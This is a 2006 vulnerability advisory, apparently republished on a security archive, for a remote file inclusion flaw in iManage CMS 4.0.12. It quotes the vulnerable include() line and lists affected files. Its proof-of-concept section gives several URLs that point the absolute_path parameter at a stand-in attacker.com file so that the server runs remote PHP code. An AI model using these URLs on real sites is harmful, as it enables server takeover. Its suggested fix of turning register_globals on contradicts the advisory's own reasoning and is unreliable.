iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion

2006-07-25 / 2006-07-26
Credit: Ahmad Maulana a.k.a Matdhule
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-3771
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

ECHO.OR.ID ECHO_ADV_40$2006 ------------------------------------------------------------------------ --------------------------- [ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion ------------------------------------------------------------------------ --------------------------- Author : Ahmad Maulana a.k.a Matdhule Date Found : July, 20th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ iManage CMS from Imaginex-Resource Application : iManage CMS version : 4.0.12 stable URL : http://www.imaginex-resource.com ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~~~~~~ -----------------------component.php---------------------- .... <?php /** * iManage Version 4.0.12 * Dynamic portal server and Content managment engine * 03-02-2003 * * Copyright (C) 2000 - 2003 Imaginex-Resource * * Site Name: iManage Version 4.0.12 * File Name: rightComponent.php * Date: 31/01/2003 * Version #: 4.0.12 * Comments: Display all modules which are to be displayed on the right. **/ include($absolute_path.'/language/'.$lang.'/lang_components.php'); ... ---------------------------------------------------------- Input passed to the "absolute_path" parameter in insert.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources Affected files: articles.php contact.php displaypage.php faq.php mainbody.php news.php registration.php whosOnline.php components/com_calendar.php components/com_forum.php components/minibb/index.php components/minibb/bb_admin.php components/minibb/bb_plugins.php modules/mod_calendar.php modules/mod_browser_prefs.php modules/mod_counter.php modules/mod_online.php modules/mod_stats.php modules/mod_weather.php themes/bizz.php themes/default.php themes/simple.php themes/original.php themes/portal.php themes/purple.php and more :) Successful exploitation requires that "register_globals= Off ". Proof Of Concept: ~~~~~~~~~~~~~~~~~ http://target.com/[path]/articles.php?absolute_path=http://attacker.com/ /inject.txt? http://target.com/[path]/contact.php?absolute_path=http://attacker.com// inject.txt? http://target.com/[path]/displaypage.php?absolute_path=http://attacker.c om//inject.txt? http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inje ct.txt? http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com/ /inject.txt? http://target.com/[path]/news.php?absolute_path=http://attacker.com//inj ect.txt? http://target.com/[path]/registration.php?absolute_path=http://attacker. com//inject.txt? http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.co m//inject.txt? http://target.com/[path]/components/com_calendar.php?absolute_path=http: //attacker.com//inject.txt? http://target.com/[path]/components/com_forum.php?absolute_path=http://a ttacker.com//inject.txt? http://target.com/[path]/components/minibb/index.php?absolute_path=http: //attacker.com//inject.txt? http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://a ttacker.com//inject.txt? and more Affected files Solution: ~~~~~~~~~ - Change register_globals= On in php.ini - Sanitize variable $absolute_path on affected files. ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker (at) yahoogroups (dot) com [email concealed], jasakom_perjuangan (at) yahoogroups (dot) com [email concealed] ~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top